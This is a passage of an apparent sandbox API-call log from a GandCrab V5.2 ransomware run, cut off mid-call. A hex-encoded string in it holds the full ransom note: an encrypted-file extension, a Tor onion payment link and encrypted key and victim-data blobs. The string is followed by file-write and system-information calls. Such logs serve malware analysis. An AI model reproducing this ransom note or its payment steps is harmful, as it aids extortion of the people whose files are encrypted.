(lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0096.136] CloseHandle (hObject=0x2b4) returned 1 [0096.136] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.136] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.136] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1c9)) [0096.136] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.136] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.137] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.137] wsprintfW (in: param_1=0x1e70000, 